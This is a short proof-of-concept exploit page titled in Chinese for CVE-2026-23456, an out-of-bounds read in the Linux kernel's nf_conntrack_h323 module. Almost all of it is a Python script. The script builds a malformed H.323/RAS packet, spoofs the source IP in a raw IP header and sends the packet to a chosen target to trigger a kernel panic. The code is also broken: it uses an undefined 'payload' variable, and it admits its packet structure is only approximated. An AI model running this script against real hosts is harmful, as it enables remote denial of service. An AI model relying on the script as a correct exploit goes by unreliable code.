CVE-2026-23456 Linux内核nf_conntrack_h323越界读取漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-23456: Linux Kernel nf_conntrack_h323 OOB Read This script sends a crafted H.323/RAS packet to trigger the kernel panic. Target: Linux system with nf_conntrack_h323 module loaded and listening on port 1719. """ import socket import struct import sys def create_malformed_h323_packet(): """ Constructs a basic UDP packet with a payload designed to trigger the OOB read in the decode_int() CONS case. Note: Specific H.323 ASN.1 structure is approximated to demonstrate the concept. """ # UDP Header (Source Port: 12345, Dest Port: 1719 - RAS) src_port = 12345 dst_port = 1719 udp_header = struct.pack('!HHHH', src_port, dst_port, 8, 0) # Length 8, Checksum 0 # Malformed Payload # The goal is to hit the CONS case where get_bits reads a length, # but the buffer is too short for get_uint. # We inject a length byte that claims more data exists. payload = b'\x27\x00' # Generic H.323 header start payload += b'\x04' # Tag potentially leading to CONS decode payload += b'\xFF' # Malformed length indicator return udp_header + payload def send_packet(target_ip): try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # IP Header construction ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version/HL 0, # TOS 20 + 8 + len(payload), # Total Length 12345, # ID 0, # Frag 64, # TTL 17, # Protocol (UDP) 0, # Checksum (0 for raw socket calc) socket.inet_aton("192.168.1.100"), # Src IP (spoofed) socket.inet_aton(target_ip)) # Dst IP packet = ip_header + create_malformed_h323_packet() sock.sendto(packet, (target_ip, 0)) print(f"[+] Malformed packet sent to {target_ip}") except PermissionError: print("[-] Error: Raw sockets require root privileges.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <TARGET_IP>") else: send_packet(sys.argv[1])